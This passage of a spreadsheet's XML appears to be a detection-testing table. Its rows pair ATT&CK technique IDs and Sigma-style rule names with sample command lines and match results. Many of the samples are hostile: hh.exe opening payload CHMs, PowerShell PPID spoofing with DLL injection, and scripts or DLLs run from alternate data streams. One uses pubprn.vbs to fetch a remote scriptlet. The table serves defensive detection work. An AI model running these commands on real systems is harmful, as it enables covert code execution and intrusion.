          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2851" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C2851" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2851" s="43" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E2851" s="43" t="inlineStr">
        <is>
          <t>hh.exe "C:\Users\Public\Downloads\malicious_payload.txt"</t>
        </is>
      </c>
      <c r="F2851" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2851" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2851" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2851" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2851" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2851" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2852" ht="15.75" customHeight="1" s="42">
      <c r="A2852" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2852" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C2852" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2852" s="43" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E2852" s="43" t="inlineStr">
        <is>
          <t>hh.exe "C:\Users\Public\legit.CH#"</t>
        </is>
      </c>
      <c r="F2852" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2852" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2852" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2852" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2852" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2852" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2853" ht="15.75" customHeight="1" s="42">
      <c r="A2853" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B2853" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_remote_download_or_execution</t>
        </is>
      </c>
      <c r="C2853" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE</t>
        </is>
      </c>
      <c r="D2853" s="43" t="inlineStr">
        <is>
          <t>f57c58b3-ee69-4ef5-9041-455bf39aaa89</t>
        </is>
      </c>
      <c r="E2853" s="43" t="inlineStr">
        <is>
          <t>hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm</t>
        </is>
      </c>
      <c r="F2853" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2853" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2853" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2853" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J2853" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2853" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2854" ht="15.75" customHeight="1" s="42">
      <c r="A2854" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2854" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2854" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2854" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2854" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm</t>
        </is>
      </c>
      <c r="F2854" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2854" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2854" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2854" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J2854" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2854" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2855" ht="15.75" customHeight="1" s="42">
      <c r="A2855" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2855" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2855" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2855" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2855" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm"</t>
        </is>
      </c>
      <c r="F2855" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2855" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2855" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2855" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J2855" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2855" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2856" ht="15.75" customHeight="1" s="42">
      <c r="A2856" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2856" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2856" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2856" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2856" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\..\payload.chm</t>
        </is>
      </c>
      <c r="F2856" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2856" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2856" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2856" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J2856" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2856" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2857" ht="15.75" customHeight="1" s="42">
      <c r="A2857" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2857" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2857" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2857" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2857" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm::/script.htm</t>
        </is>
      </c>
      <c r="F2857" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2857" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2857" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2857" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J2857" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2857" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2858" ht="15.75" customHeight="1" s="42">
      <c r="A2858" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2858" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2858" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2858" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2858" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm --</t>
        </is>
      </c>
      <c r="F2858" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2858" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2858" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2858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2858" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2858" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2859" ht="15.75" customHeight="1" s="42">
      <c r="A2859" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2859" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2859" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2859" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2859" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm"</t>
        </is>
      </c>
      <c r="F2859" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2859" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2859" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2859" s="43" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J2859" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2859" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2860" ht="15.75" customHeight="1" s="42">
      <c r="A2860" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2860" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2860" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2860" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2860" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm\</t>
        </is>
      </c>
      <c r="F2860" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2860" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2860" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2860" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J2860" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2860" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2861" ht="15.75" customHeight="1" s="42">
      <c r="A2861" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B2861" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C2861" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D2861" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E2861" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\AppData\Local\Temp\payload.chm::</t>
        </is>
      </c>
      <c r="F2861" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2861" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2861" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2861" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J2861" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2861" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2862" ht="15.75" customHeight="1" s="42">
      <c r="A2862" s="43" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B2862" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_selectmyparent</t>
        </is>
      </c>
      <c r="C2862" s="43" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution</t>
        </is>
      </c>
      <c r="D2862" s="43" t="inlineStr">
        <is>
          <t>52ff7941-8211-46f9-84f8-9903efb7077d</t>
        </is>
      </c>
      <c r="E2862" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {. 'C:\AtomicRedTeam\atomics\T1134.004\src\PPID-Spoof.ps1' $ppid=Get-Process explorer | select -expand id PPID-Spoof -ppid $ppid -spawnto 'C:\Program Files\Internet Explorer\iexplore.exe' -dllpath 'C:\AtomicRedTeam\atomics\T1134.004\bin\calc.dll'}"</t>
        </is>
      </c>
      <c r="F2862" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2862" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2862" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2862" s="43" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution (52ff7941-8211-46f9-84f8-9903efb7077d)</t>
        </is>
      </c>
      <c r="J2862" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2862" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2863" ht="15.75" customHeight="1" s="42">
      <c r="A2863" s="43" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B2863" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_selectmyparent</t>
        </is>
      </c>
      <c r="C2863" s="43" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution</t>
        </is>
      </c>
      <c r="D2863" s="43" t="inlineStr">
        <is>
          <t>52ff7941-8211-46f9-84f8-9903efb7077d</t>
        </is>
      </c>
      <c r="E2863" s="43" t="inlineStr">
        <is>
          <t>node.exe -e "require('child_process').execSync('cmd /c echo PPID-spoof')"</t>
        </is>
      </c>
      <c r="F2863" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2863" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2863" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2863" s="43" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution (52ff7941-8211-46f9-84f8-9903efb7077d)</t>
        </is>
      </c>
      <c r="J2863" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2863" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2864" ht="15.75" customHeight="1" s="42">
      <c r="A2864" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B2864" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_extrac32_ads</t>
        </is>
      </c>
      <c r="C2864" s="43" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Alternate Data Stream Execution</t>
        </is>
      </c>
      <c r="D2864" s="43" t="inlineStr">
        <is>
          <t>4b13db67-0c45-40f1-aba8-66a1a7198a1e</t>
        </is>
      </c>
      <c r="E2864" s="43" t="inlineStr">
        <is>
          <t>extrac32.exe -Y -L "C:\\target\\path\" C:\\test\\data.cab file.txt:ads</t>
        </is>
      </c>
      <c r="F2864" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2864" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2864" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2864" s="43" t="inlineStr">
        <is>
          <t>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J2864" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2864" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2865" ht="15.75" customHeight="1" s="42">
      <c r="A2865" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B2865" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C2865" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D2865" s="43" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E2865" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Expression (Get-Content -Path 'C:\test.txt' -Stream 'secret.ps1')"</t>
        </is>
      </c>
      <c r="F2865" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2865" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2865" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2865" s="43" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Execution (aa8e035d-7be4-48d3-a944-102aec04400d)</t>
        </is>
      </c>
      <c r="J2865" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2865" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2866" ht="15.75" customHeight="1" s="42">
      <c r="A2866" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B2866" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C2866" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D2866" s="43" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E2866" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $s = [System.IO.File]::Open('file.txt:secret.ps1', [System.IO.FileMode]::Open); $r = New-Object System.IO.StreamReader($s); IEX $r.ReadToEnd(); $r.Close() }"</t>
        </is>
      </c>
      <c r="F2866" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2866" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2866" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2866" s="43" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Alternate Data Stream Execution (4b13db67-0c45-40f1-aba8-66a1a7198a1e)</t>
        </is>
      </c>
      <c r="J2866" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2866" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2867" ht="15.75" customHeight="1" s="42">
      <c r="A2867" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B2867" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_ads</t>
        </is>
      </c>
      <c r="C2867" s="43" t="inlineStr">
        <is>
          <t>Run PowerShell Script from ADS</t>
        </is>
      </c>
      <c r="D2867" s="43" t="inlineStr">
        <is>
          <t>45a594aa-1fbd-4972-a809-ff5a99dd81b8</t>
        </is>
      </c>
      <c r="E2867" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Content -Path 'C:\test.txt' -Stream 'secret.ps1' | Invoke-Expression"</t>
        </is>
      </c>
      <c r="F2867" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2867" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2867" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2867" s="43" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Execution (aa8e035d-7be4-48d3-a944-102aec04400d); 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J2867" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2867" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2868" ht="15.75" customHeight="1" s="42">
      <c r="A2868" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B2868" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ads_stored_dll_execution</t>
        </is>
      </c>
      <c r="C2868" s="43" t="inlineStr">
        <is>
          <t>Potential Rundll32 Execution With DLL Stored In ADS</t>
        </is>
      </c>
      <c r="D2868" s="43" t="inlineStr">
        <is>
          <t>9248c7e1-2bf3-4661-a22c-600a8040b446</t>
        </is>
      </c>
      <c r="E2868" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe file.txt:malicious.dll,DllMain</t>
        </is>
      </c>
      <c r="F2868" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2868" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2868" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2868" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2868" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2868" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2869" ht="15.75" customHeight="1" s="42">
      <c r="A2869" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B2869" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ads_stored_dll_execution</t>
        </is>
      </c>
      <c r="C2869" s="43" t="inlineStr">
        <is>
          <t>Potential Rundll32 Execution With DLL Stored In ADS</t>
        </is>
      </c>
      <c r="D2869" s="43" t="inlineStr">
        <is>
          <t>9248c7e1-2bf3-4661-a22c-600a8040b446</t>
        </is>
      </c>
      <c r="E2869" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe "file.txt:malicious.dll", DllMain</t>
        </is>
      </c>
      <c r="F2869" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2869" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2869" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2869" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J2869" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2869" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2870" ht="15.75" customHeight="1" s="42">
      <c r="A2870" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B2870" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ads_stored_dll_execution</t>
        </is>
      </c>
      <c r="C2870" s="43" t="inlineStr">
        <is>
          <t>Potential Rundll32 Execution With DLL Stored In ADS</t>
        </is>
      </c>
      <c r="D2870" s="43" t="inlineStr">
        <is>
          <t>9248c7e1-2bf3-4661-a22c-600a8040b446</t>
        </is>
      </c>
      <c r="E2870" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe "..\..\file.txt:malicious.dll",DllMain</t>
        </is>
      </c>
      <c r="F2870" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2870" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2870" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2870" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J2870" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2870" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2871" ht="15.75" customHeight="1" s="42">
      <c r="A2871" s="43" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B2871" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_ads_stored_dll_execution</t>
        </is>
      </c>
      <c r="C2871" s="43" t="inlineStr">
        <is>
          <t>Potential Rundll32 Execution With DLL Stored In ADS</t>
        </is>
      </c>
      <c r="D2871" s="43" t="inlineStr">
        <is>
          <t>9248c7e1-2bf3-4661-a22c-600a8040b446</t>
        </is>
      </c>
      <c r="E2871" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe $env:TEMP\file.txt:malicious.dll,DllMain</t>
        </is>
      </c>
      <c r="F2871" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2871" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2871" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2871" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J2871" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2871" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2872" ht="15.75" customHeight="1" s="42">
      <c r="A2872" s="43" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B2872" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_launch_vsdevshell</t>
        </is>
      </c>
      <c r="C2872" s="43" t="inlineStr">
        <is>
          <t>Launch-VsDevShell.PS1 Proxy Execution</t>
        </is>
      </c>
      <c r="D2872" s="43" t="inlineStr">
        <is>
          <t>45d3a03d-f441-458c-8883-df101a3bb146</t>
        </is>
      </c>
      <c r="E2872" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -File "Launch-VsDevShell.ps1" -VsWherePath "evil.exe" -VsInstallationPath "C:\"</t>
        </is>
      </c>
      <c r="F2872" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2872" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2872" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2872" s="43" t="inlineStr">
        <is>
          <t>Launch-VsDevShell.PS1 Proxy Execution (45d3a03d-f441-458c-8883-df101a3bb146); Launch-VsDevShell.PS1 Proxy Execution (45d3a03d-f441-458c-8883-df101a3bb146)</t>
        </is>
      </c>
      <c r="J2872" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2872" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2873" ht="15.75" customHeight="1" s="42">
      <c r="A2873" s="43" t="inlineStr">
        <is>
          <t>t1216.001</t>
        </is>
      </c>
      <c r="B2873" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pubprn</t>
        </is>
      </c>
      <c r="C2873" s="43" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution</t>
        </is>
      </c>
      <c r="D2873" s="43" t="inlineStr">
        <is>
          <t>1fb76ab8-fa60-4b01-bddd-71e89bf555da</t>
        </is>
      </c>
      <c r="E2873" s="43" t="inlineStr">
        <is>
          <t>cscript //nologo pubprn.vbs 127.0.0.1 "scr\"ipt:https://remote.server/payload.sct"</t>
        </is>
      </c>
      <c r="F2873" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2873" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2873" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2873" s="43" t="inlineStr">
        <is>
          <t>Pubprn.vbs Proxy Execution (1fb76ab8-fa60-4b01-bddd-71e89bf555da)</t>
        </is>
      </c>
      <c r="J2873" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2873" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2874" ht="15.75" customHeight="1" s="42">
      <c r="A2874" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2874" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_manage_bde</t>
        </is>
      </c>
      <c r="C2874" s="43" t="inlineStr">
        <is>
          <t>Potential Manage-bde.wsf Abuse To Proxy Execution</t>
        </is>
      </c>
      <c r="D2874" s="43" t="inlineStr">
        <is>
          <t>c363385c-f75d-4753-a108-c1a8e28bdbda</t>
        </is>
      </c>
      <c r="E2874" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd /d C:\Windows\System32\ &amp;&amp; cscript.exe //nologo manage-bde.wsf"</t>
        </is>
      </c>
      <c r="F2874" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2874" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2874" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2874" s="43" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120); UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120)</t>
        </is>
      </c>
      <c r="J2874" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2874" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2875" ht="15.75" customHeight="1" s="42">
      <c r="A2875" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2875" s="43" t="inlineStr">
        <is>
